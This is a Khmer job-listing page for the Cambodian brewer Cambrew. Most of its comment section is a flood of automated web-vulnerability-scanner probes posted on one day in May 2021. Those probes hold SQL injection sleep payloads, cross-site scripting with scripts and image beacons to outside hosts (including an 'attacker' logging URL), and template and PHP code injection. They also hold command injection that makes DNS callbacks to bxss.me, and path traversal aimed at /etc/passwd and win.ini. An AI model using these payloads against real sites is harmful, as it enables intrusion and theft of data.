ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ក្រុមហ៊ុន ស្រាបៀរ កម្ពុជា ខេមប្រ៊ូវ
ក្រុមហ៊ុនខេមប្រ៊ូវ គឹជារោងចក្រផលិតស្រាបៀរទី ១ និងធំជាងគេ នៅព្រះរាជាណាចក្រកម្ពុជាហើយជាបុត្រសម្ព័ន្ធរបស់ក្រុមហ៊ុនកាស្ប៊ែរគ្រុប ប្រទេសដាណាម៉ាក។ ក្រុមហ៊ុនខេមប្រ៊ូវ គឺជាក្រុមហ៊ុនផលិត និងចែកចាយ ស្រាបៀរ ដែលមានម៉ាកសញ្ញាល្បីៗ ទាំងផលិតផលជាតិ និងអន្តរជាតិជាច្រើន។ ក្នុងនោះ ម៉ាកសញ្ញាធំជាងគេរបស់ក្រុមហ៊ុន គឺ ស្រាបៀរអង្គរ ដែលត្រូវបានទទួលស្គាល់ពីសំណាក់ប្រជាជនខ្មែរ ជាពិសេសតាមរយៈពាក្យស្លោក ប្រទេសខ្ញុំ ស្រាបៀរខ្ញុំ។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 69

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 56 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 10:04:11


  @@lW3UT


 • pHqghUme

  2021-05-06 10:04:06


  1'"


 • pHqghUme

  2021-05-06 10:04:05


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 10:03:39


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 10:03:17


  i5B0Mvyp')) OR 106=(SELECT 106 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:02:49


  gJ5OEIzg') OR 49=(SELECT 49 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:02:21


  iKai2vyM' OR 262=(SELECT 262 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:01:58


  -1)) OR 62=(SELECT 62 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:01:31


  -5) OR 531=(SELECT 531 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:01:00


  -5 OR 867=(SELECT 867 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:00:30


  SqXk9zrF'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 10:00:05


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:59:34


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:59:11


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:58:42


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:58:13


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:57:47


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:57:20


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:56:54


  -1" OR 2+232-232-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:56:53


  -1' OR 2+153-153-1=0+0+0+1 or 'YpFsQmiJ'='


 • pHqghUme

  2021-05-06 09:56:52


  -1' OR 2+155-155-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:56:50


  -1 OR 2+129-129-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:56:49


  -1 OR 2+836-836-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:56:48


  gohpYQOX


 • pHqghUme

  2021-05-06 09:56:27


  1


 • pHqghUme

  2021-05-06 09:56:02


  1


 • @@kA30g

  2021-05-06 09:55:44


  1


 • 1'"

  2021-05-06 09:55:37


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:55:36


  1


 • 21vDl1Hw')) OR 320=(SELECT 320 FROM PG_SLEEP(15))--

  2021-05-06 09:55:19


  1


 • WPW9weqh') OR 785=(SELECT 785 FROM PG_SLEEP(15))--

  2021-05-06 09:54:58


  1


 • dhsH0ktq' OR 33=(SELECT 33 FROM PG_SLEEP(15))--

  2021-05-06 09:54:35


  1


 • ek8jDgTS'; waitfor delay '0:0:15' --

  2021-05-06 09:54:07


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 09:53:44


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 09:53:24


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 09:53:08


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 09:52:50


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 09:52:33


  1


 • -1" OR 2+821-821-1=0+0+0+1 --

  2021-05-06 09:52:17


  1


 • -1' OR 2+194-194-1=0+0+0+1 or 'GSGVnd7h'='

  2021-05-06 09:52:16


  1


 • -1' OR 2+389-389-1=0+0+0+1 --

  2021-05-06 09:52:15


  1


 • -1 OR 2+406-406-1=0+0+0+1 --

  2021-05-06 09:52:14


  1


 • -1 OR 2+64-64-1=0+0+0+1

  2021-05-06 09:52:14


  1


 • oB9xJDee

  2021-05-06 09:52:12


  1


 • pHqghUme

  2021-05-06 09:51:49


  1


 • pHqghUme

  2021-05-06 09:51:26


  1


 • pHqghUme

  2021-05-06 09:51:06


  1


 • pHqghUme

  2021-05-06 09:51:03


  1


 • pHqghUme

  2021-05-06 09:51:02


  1


 • pHqghUme

  2021-05-06 09:50:42


  1


 • pHqghUme

  2021-05-06 09:50:21


  1


 • pHqghUme

  2021-05-06 09:50:14


  1<IZXQuO<


 • pHqghUme

  2021-05-06 09:50:09


  1<img sRc='http://attacker-9763/log.php?


 • pHqghUme

  2021-05-06 09:50:04


  1<nUtTuz x=9805>


 • pHqghUme

  2021-05-06 09:49:57


  1


 • pHqghUme

  2021-05-06 09:49:55


  1<ifRAme sRc=9823.com></IfRamE>


 • pHqghUme

  2021-05-06 09:49:51


  1<WKMQGG>DFIFP[!+!]</WKMQGG>


 • pHqghUme

  2021-05-06 09:49:45


  1gZbgC <ScRiPt >T9Ll(9484)</ScRiPt>


 • pHqghUme

  2021-05-06 09:49:42


  1


 • pHqghUme

  2021-05-06 09:49:37


  1<% contenteditable onresize=T9Ll(9825)>


 • pHqghUme

  2021-05-06 09:49:32


  1}body{acu:Expre/**/SSion(T9Ll(9236))}


 • pHqghUme

  2021-05-06 09:49:27


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:49:26


  1


 • pHqghUme

  2021-05-06 09:49:21


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 09:49:14


  1<input autofocus onfocus=T9Ll(9415)>


 • pHqghUme

  2021-05-06 09:49:08


  1


 • pHqghUme

  2021-05-06 09:49:06


  1&lt;ScRiPt&gt;T9Ll(9368)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:48:57


  1\u003CScRiPt\T9Ll(9236)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 09:48:50


  %31%3C%53%63%52%69%50%74%20%3E%54%39%4C%6C%289484%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 09:48:45


  1<img/src=">" onerror=alert(9074)>


 • pHqghUme

  2021-05-06 09:48:44


  1


 • pHqghUme

  2021-05-06 09:48:40


  1<img src=xyz OnErRor=T9Ll(9360)>


 • pHqghUme

  2021-05-06 09:48:32


  1<img src=//xss.bxss.me/t/dot.gif onload=T9Ll(9728)>


 • pHqghUme

  2021-05-06 09:48:25


  1<body onload=T9Ll(9330)>


 • pHqghUme

  2021-05-06 09:48:20


  1


 • pHqghUme

  2021-05-06 09:48:17


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9879'>


 • pHqghUme

  2021-05-06 09:48:10


  1<isindex type=image src=1 onerror=T9Ll(9861)>


 • pHqghUme

  2021-05-06 09:48:02


  1<ScRiPt >T9Ll(9085)</ScRiPt>


 • pHqghUme

  2021-05-06 09:48:00


  1


 • pHqghUme

  2021-05-06 09:47:57


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9896></ScRiPt>


 • pHqghUme

  2021-05-06 09:47:53


  1<ScRiPt >T9Ll(9929)</ScRiPt>


 • pHqghUme

  2021-05-06 09:47:46


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%54%39%4C%6C%28%39%33%33%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:47:40


  1


 • pHqghUme

  2021-05-06 09:47:38


  1


 • pHqghUme

  2021-05-06 09:47:37


  1


 • pHqghUme

  2021-05-06 09:47:36


  1


 • pHqghUme

  2021-05-06 09:47:36


  1<script>T9Ll(9150)</script>


 • pHqghUme

  2021-05-06 09:47:35


  1


 • pHqghUme

  2021-05-06 09:47:34


  1


 • pHqghUme

  2021-05-06 09:47:23


  1<WEPYRA>XD6FW[!+!]</WEPYRA>


 • pHqghUme

  2021-05-06 09:47:21


  1


 • pHqghUme

  2021-05-06 09:47:12


  1<ScRiPt >T9Ll(9529)</ScRiPt>


 • pHqghUme

  2021-05-06 09:47:05


  1


 • pHqghUme

  2021-05-06 09:47:03


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:46:55


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:46:50


  1


 • pHqghUme

  2021-05-06 09:46:47


  1


 • pHqghUme

  2021-05-06 09:46:46


  1


 • pHqghUme

  2021-05-06 09:46:44


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:46:38


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:46:33


  1


 • pHqghUme

  2021-05-06 09:46:28


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:46:24


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:46:18


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:46:12


  1


 • pHqghUme

  2021-05-06 09:46:07


  acux4569%C0%BEz1%C0%BCz2a%90bcxuca4569


 • pHqghUme

  2021-05-06 09:46:00


  acu3818%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3818


 • pHqghUme

  2021-05-06 09:45:55


  19567450


 • pHqghUme

  2021-05-06 09:45:51


  1


 • pHqghUme

  2021-05-06 09:45:48


  '"()&%<acx><ScRiPt >T9Ll(9866)</ScRiPt>


 • pHqghUme

  2021-05-06 09:45:40


  1'"()&%<acx><ScRiPt >T9Ll(9952)</ScRiPt>


 • pHqghUme

  2021-05-06 09:45:34


  1


 • pHqghUme<uSZU1t<

  2021-05-06 09:45:31


  1


 • pHqghUme<img sRc='http://attacker-9151/log.php?

  2021-05-06 09:45:24


  1


 • pHqghUme<ti6oFf x=9362>

  2021-05-06 09:45:17


  1


 • pHqghUme

  2021-05-06 09:45:16


  1


 • pHqghUme<ifRAme sRc=9336.com></IfRamE>

  2021-05-06 09:45:12


  1


 • pHqghUme<WJUJNS>RVDDG[!+!]</WJUJNS>

  2021-05-06 09:45:06


  1


 • pHqghUmeXqXFM <ScRiPt >T9Ll(9267)</ScRiPt>

  2021-05-06 09:44:57


  1


 • pHqghUme<% contenteditable onresize=T9Ll(9262)>

  2021-05-06 09:44:53


  1


 • pHqghUme

  2021-05-06 09:44:51


  1


 • pHqghUme}body{acu:Expre/**/SSion(T9Ll(9883))}

  2021-05-06 09:44:48


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 09:44:43


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 09:44:38


  1


 • pHqghUme<input autofocus onfocus=T9Ll(9580)>

  2021-05-06 09:44:34


  1


 • pHqghUme

  2021-05-06 09:44:25


  1


 • pHqghUme&lt;ScRiPt&gt;T9Ll(9761)&lt;/sCripT&gt;

  2021-05-06 09:44:25


  1


 • pHqghUme\u003CScRiPt\T9Ll(9929)\u003C/sCripT\u003E

  2021-05-06 09:44:19


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%54%39%4C%6C%289732%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 09:44:14


  1


 • pHqghUme<img/src=">" onerror=alert(9654)>

  2021-05-06 09:44:11


  1


 • pHqghUme<img src=xyz OnErRor=T9Ll(9789)>

  2021-05-06 09:44:05


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=T9Ll(9502)>

  2021-05-06 09:44:00


  1


 • pHqghUme

  2021-05-06 09:43:58


  1


 • pHqghUme<body onload=T9Ll(9245)>

  2021-05-06 09:43:55


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9500'>

  2021-05-06 09:43:49


  1


 • pHqghUme<isindex type=image src=1 onerror=T9Ll(9250)>

  2021-05-06 09:43:45


  1


 • pHqghUme

  2021-05-06 09:43:38


  1


 • pHqghUme<ScRiPt >T9Ll(9667)</ScRiPt>

  2021-05-06 09:43:33


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9207></ScRiPt>

  2021-05-06 09:43:22


  1


 • pHqghUme

  2021-05-06 09:43:20


  1


 • pHqghUme

  2021-05-06 09:43:19


  1


 • pHqghUme

  2021-05-06 09:43:18


  1


 • pHqghUme

  2021-05-06 09:43:18


  1


 • pHqghUme

  2021-05-06 09:43:17


  1


 • pHqghUme

  2021-05-06 09:43:16


  1


 • pHqghUme<ScRiPt >T9Ll(9796)</ScRiPt>

  2021-05-06 09:43:11


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%54%39%4C%6C%28%39%39%31%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 09:43:06


  1


 • pHqghUme<script>T9Ll(9400)</script>

  2021-05-06 09:43:00


  1


 • pHqghUme

  2021-05-06 09:42:55


  1


 • pHqghUme<WB4QV7>RQEUA[!+!]</WB4QV7>

  2021-05-06 09:42:54


  1


 • pHqghUme<ScRiPt >T9Ll(9429)</ScRiPt>

  2021-05-06 09:42:48


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:42:40


  1


 • pHqghUme

  2021-05-06 09:42:37


  1


 • acx__${98991*97996}__::.x

  2021-05-06 09:42:31


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 09:42:25


  1


 • acx{{98991*97996}}xca

  2021-05-06 09:42:19


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 09:42:15


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:42:10


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 09:42:06


  1


 • acux3084%C0%BEz1%C0%BCz2a%90bcxuca3084

  2021-05-06 09:42:02


  1


 • acu9495%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9495

  2021-05-06 09:41:58


  1


 • pHqghUme9831792

  2021-05-06 09:41:50


  1


 • '"()&%<acx><ScRiPt >T9Ll(9429)</ScRiPt>

  2021-05-06 09:41:45


  1


 • pHqghUme'"()&%<acx><ScRiPt >T9Ll(9738)</ScRiPt>

  2021-05-06 09:41:41


  1


 • pHqghUme

  2021-05-06 09:41:36


  1


 • pHqghUme

  2021-05-06 09:41:29


  1


 • pHqghUme

  2021-05-06 09:41:21


  1


 • pHqghUme

  2021-05-06 09:41:14


  1


 • pHqghUme

  2021-05-06 09:41:09


  1


 • pHqghUme

  2021-05-06 09:41:00


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 09:40:59


  1


 • pHqghUme

  2021-05-06 09:40:59


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 09:40:58


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 09:40:57


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 09:40:56


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 09:40:56


  ';print(md5(31337));$a='


 • '.print(md5(31337)).'

  2021-05-06 09:40:55


  1


 • pHqghUme

  2021-05-06 09:40:54


  <!--


 • ${@print(md5(31337))}\

  2021-05-06 09:40:54


  1


 • pHqghUme

  2021-05-06 09:40:53


  '+'A'.concat(70-3).concat(22*4).concat(120).concat(68).concat(114).concat(78)+(require'socket' Socket.gethostbyname('hitlc'+'oondeaoj4e8a7.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 09:40:53


  '"


 • ${@print(md5(31337))}

  2021-05-06 09:40:53


  1


 • ';print(md5(31337));$a='

  2021-05-06 09:40:52


  1


 • pHqghUme

  2021-05-06 09:40:52


  "+"A".concat(70-3).concat(22*4).concat(112).concat(84).concat(115).concat(74)+(require"socket" Socket.gethostbyname("hitcq"+"sduyacea71fba.bxss.me.")[3].to_s)+"


 • <!--

  2021-05-06 09:40:52


  1


 • ";print(md5(31337));$a="

  2021-05-06 09:40:52


  1


 • pHqghUme

  2021-05-06 09:40:51


  bxss.me/t/xss.html?%00


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 09:40:51


  1


 • '"

  2021-05-06 09:40:51


  1


 • '+'A'.concat(70-3).concat(22*4).concat(110).concat(88).concat(104).concat(89)+(require'socket' Socket.gethostbyname('hitol'+'kvhkdjrt83ab2.bxss.me.')[3].to_s)+'

  2021-05-06 09:40:51


  1


 • pHqghUme

  2021-05-06 09:40:50


  HttP://bxss.me/t/xss.html?%00


 • "+"A".concat(70-3).concat(22*4).concat(115).concat(65).concat(105).concat(71)+(require"socket" Socket.gethostbyname("hitok"+"vryrnsth5df5c.bxss.me.")[3].to_s)+"

  2021-05-06 09:40:50


  1


 • pHqghUme

  2021-05-06 09:40:50


  1


 • pHqghUme

  2021-05-06 09:40:50


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 09:40:49


  1


 • pHqghUme

  2021-05-06 09:40:49


  1


 • pHqghUme

  2021-05-06 09:40:49


  1


 • pHqghUme

  2021-05-06 09:40:49


  1


 • pHqghUme

  2021-05-06 09:40:49


  /xfs.bxss.me


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 09:40:48


  1


 • pHqghUme

  2021-05-06 09:40:48


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 09:40:48


  1


 • pHqghUme

  2021-05-06 09:40:48


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 09:40:48


  1


 • /xfs.bxss.me

  2021-05-06 09:40:48


  1


 • pHqghUme

  2021-05-06 09:40:48


  1


 • pHqghUme

  2021-05-06 09:40:47


  1


 • pHqghUme

  2021-05-06 09:40:47


  '"()


 • pHqghUme

  2021-05-06 09:40:47


  1


 • pHqghUme

  2021-05-06 09:40:47


  1


 • pHqghUme

  2021-05-06 09:40:45


  1


 • pHqghUme

  2021-05-06 09:40:44


  1


 • pHqghUme

  2021-05-06 09:40:44


  1


 • pHqghUme

  2021-05-06 09:40:44


  1


 • pHqghUme

  2021-05-06 09:40:44


  1


 • pHqghUme

  2021-05-06 09:40:44


  1


 • pHqghUme

  2021-05-06 09:40:44


  1


 • pHqghUme

  2021-05-06 09:40:44


  1


 • '"()

  2021-05-06 09:40:43


  1


 • pHqghUme

  2021-05-06 09:40:43


  1


 • pHqghUme

  2021-05-06 09:40:42


  1


 • pHqghUme

  2021-05-06 09:40:42


  1


 • pHqghUme

  2021-05-06 09:40:42


  1


 • pHqghUme

  2021-05-06 09:40:42


  1


 • pHqghUme

  2021-05-06 09:40:41


  1


 • pHqghUme

  2021-05-06 09:40:41


  1


 • pHqghUme

  2021-05-06 09:40:40


  1


 • pHqghUme

  2021-05-06 09:40:39


  1


 • pHqghUme

  2021-05-06 09:40:39


  1&n966283=v903930


 • pHqghUme

  2021-05-06 09:40:38


  '.gethostbyname(lc('hitxa'.'jklydmdkc5324.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(82).chr(121).chr(73).'


 • pHqghUme

  2021-05-06 09:40:38


  ".gethostbyname(lc("hitbu"."lbsjztfj34a33.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(67).chr(119).chr(78)."


 • pHqghUme

  2021-05-06 09:40:38


  1


 • '.gethostbyname(lc('hithl'.'xewimdqzdc699.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(65).chr(117).chr(75).'

  2021-05-06 09:40:37


  1


 • ".gethostbyname(lc("hitqf"."zzcbnctod17b7.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(66).chr(118).chr(85)."

  2021-05-06 09:40:37


  1


 • pHqghUme

  2021-05-06 09:40:36


  1


 • pHqghUme

  2021-05-06 09:40:36


  1


 • pHqghUme

  2021-05-06 09:40:36


  1


 • pHqghUme

  2021-05-06 09:40:35


  1


 • pHqghUme

  2021-05-06 09:40:35


  1


 • pHqghUme

  2021-05-06 09:40:34


  bxss.me


 • pHqghUme&n910608=v950151

  2021-05-06 09:40:34


  1


 • pHqghUme

  2021-05-06 09:40:33


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 09:40:33


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 09:40:32


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 09:40:32


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 09:40:31


  ^(#$!@#$)(()))******


 • bxss.me

  2021-05-06 09:40:31


  1


 • pHqghUme

  2021-05-06 09:40:31


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • Http://bxss.me/t/fit.txt

  2021-05-06 09:40:30


  1


 • pHqghUme

  2021-05-06 09:40:30


  !(()&&!|*|*|


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 09:40:30


  1


 • pHqghUme

  2021-05-06 09:40:29


  `(nslookup hitllliwhpmthba09e.bxss.me||perl -e "gethostbyname('hitllliwhpmthba09e.bxss.me')")`


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 09:40:29


  1


 • pHqghUme

  2021-05-06 09:40:29


  )


 • pHqghUme

  2021-05-06 09:40:28


  1


 • !(()&&!|*|*|

  2021-05-06 09:40:28


  1


 • pHqghUme

  2021-05-06 09:40:28


  |(nslookup hitmceotrnaoada6d1.bxss.me||perl -e "gethostbyname('hitmceotrnaoada6d1.bxss.me')")


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 09:40:28


  1


 • pHqghUme

  2021-05-06 09:40:28


  1


 • ^(#$!@#$)(()))******

  2021-05-06 09:40:28


  1


 • pHqghUme

  2021-05-06 09:40:27


  1


 • pHqghUme

  2021-05-06 09:40:27


  1


 • pHqghUme

  2021-05-06 09:40:27


  1


 • )

  2021-05-06 09:40:27


  1


 • pHqghUme

  2021-05-06 09:40:26


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 09:40:26


  1


 • pHqghUme

  2021-05-06 09:40:26


  1


 • pHqghUme

  2021-05-06 09:40:26


  1


 • pHqghUme

  2021-05-06 09:40:26


  1


 • pHqghUme

  2021-05-06 09:40:25


  1


 • pHqghUme

  2021-05-06 09:40:25


  1


 • pHqghUme

  2021-05-06 09:40:25


  $(nslookup hitsnemhyzlmf43eec.bxss.me||perl -e "gethostbyname('hitsnemhyzlmf43eec.bxss.me')")


 • pHqghUme

  2021-05-06 09:40:24


  1


 • pHqghUme

  2021-05-06 09:40:24


  1


 • pHqghUme

  2021-05-06 09:40:24


  |echo ymbzng$()\ khqokf\nz^xyu||a #' |echo ymbzng$()\ khqokf\nz^xyu||a #|" |echo ymbzng$()\ khqokf\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:40:24


  1


 • pHqghUme

  2021-05-06 09:40:24


  1


 • pHqghUme

  2021-05-06 09:40:24


  (nslookup hitgwkwzmdrcv485c9.bxss.me||perl -e "gethostbyname('hitgwkwzmdrcv485c9.bxss.me')")


 • pHqghUme

  2021-05-06 09:40:23


  echo jjsrzm$()\ bsnnbp\nz^xyu||a #' &echo jjsrzm$()\ bsnnbp\nz^xyu||a #|" &echo jjsrzm$()\ bsnnbp\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:40:23


  1


 • pHqghUme

  2021-05-06 09:40:23


  &echo hztepy$()\ miboys\nz^xyu||a #' &echo hztepy$()\ miboys\nz^xyu||a #|" &echo hztepy$()\ miboys\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:40:22


  1


 • pHqghUme

  2021-05-06 09:40:22


  1


 • MU10RWgxWUY=

  2021-05-06 09:40:19


  1


 • |(nslookup hitablotioevi508f2.bxss.me||perl -e "gethostbyname('hitablotioevi508f2.bxss.me')")

  2021-05-06 09:40:19


  1


 • `(nslookup hitbfditottwdf83c6.bxss.me||perl -e "gethostbyname('hitbfditottwdf83c6.bxss.me')")`

  2021-05-06 09:40:19


  1


 • pHqghUme

  2021-05-06 09:40:18


  1


 • pHqghUme

  2021-05-06 09:40:18


  ${9999344+9999263}


 • pHqghUme

  2021-05-06 09:40:17


  1


 • ${10000184+10000326}

  2021-05-06 09:40:17


  1


 • pHqghUme

  2021-05-06 09:40:16


  1


 • $(nslookup hitysxgxhqitr9d048.bxss.me||perl -e "gethostbyname('hitysxgxhqitr9d048.bxss.me')")

  2021-05-06 09:40:15


  1


 • pHqghUme

  2021-05-06 09:40:15


  1<esi:include src="http://bxss.me/rpb.png"/>


 • |echo rhnmeq$()\ mbuujf\nz^xyu||a #' |echo rhnmeq$()\ mbuujf\nz^xyu||a #|" |echo rhnmeq$()\ mbuujf\nz^xyu||a #

  2021-05-06 09:40:14


  1


 • pHqghUme

  2021-05-06 09:40:14


  1


 • (nslookup hitrxykpigmtxfcf84.bxss.me||perl -e "gethostbyname('hitrxykpigmtxfcf84.bxss.me')")

  2021-05-06 09:40:14


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 09:40:14


  1


 • echo nxtxll$()\ elgmwg\nz^xyu||a #' &echo nxtxll$()\ elgmwg\nz^xyu||a #|" &echo nxtxll$()\ elgmwg\nz^xyu||a #

  2021-05-06 09:40:13


  1


 • &echo lbtfaq$()\ ozgera\nz^xyu||a #' &echo lbtfaq$()\ ozgera\nz^xyu||a #|" &echo lbtfaq$()\ ozgera\nz^xyu||a #

  2021-05-06 09:40:13


  1


 • pHqghUme

  2021-05-06 09:40:13


  1


 • pHqghUme

  2021-05-06 09:40:12


  ../1


 • pHqghUme

  2021-05-06 09:40:11


  1


 • pHqghUme

  2021-05-06 09:40:10


  1


 • pHqghUme

  2021-05-06 09:40:10


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 09:40:10


  1


 • ../pHqghUme

  2021-05-06 09:40:09


  1


 • pHqghUme

  2021-05-06 09:40:09


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 09:40:09


  1


 • pHqghUme

  2021-05-06 09:40:08


  1


 • pHqghUme

  2021-05-06 09:40:07


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 09:40:06


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 09:40:05


  1


 • pHqghUme

  2021-05-06 09:40:04


  1


 • pHqghUme

  2021-05-06 09:40:03


  1


 • pHqghUme

  2021-05-06 09:40:02


  1


 • pHqghUme

  2021-05-06 09:40:01


  1


 • pHqghUme

  2021-05-06 09:40:00


  1


 • pHqghUme

  2021-05-06 09:40:00


  1


 • pHqghUme

  2021-05-06 09:39:59


  1


 • pHqghUme

  2021-05-06 09:39:59


  1


 • pHqghUme

  2021-05-06 09:39:59


  1


 • pHqghUme

  2021-05-06 09:39:59


  1


 • pHqghUme

  2021-05-06 09:39:58


  1


 • pHqghUme

  2021-05-06 09:39:58


  1


 • pHqghUme

  2021-05-06 09:39:58


  1


 • pHqghUme

  2021-05-06 09:39:56


  1


 • pHqghUme

  2021-05-06 09:39:56


  1


 • JGPu7sT6

  2021-05-06 09:39:54


  1


 • pHqghUme

  2021-05-06 09:39:54


  UDoa5X2M


 • pHqghUme

  2021-05-06 09:39:53


  1


 • pHqghUme

  2021-05-06 09:39:53


  1


 • pHqghUme

  2021-05-06 09:39:53


  1


 • pHqghUme

  2021-05-06 09:39:53


  1


 • pHqghUme

  2021-05-06 09:39:50


  1


 • pHqghUme

  2021-05-06 09:39:49


  1


 • pHqghUme

  2021-05-06 09:39:49


  1


 • pHqghUme

  2021-05-06 09:39:48


  1


 • pHqghUme

  2021-05-06 09:39:48


  1


 • pHqghUme

  2021-05-06 09:39:39


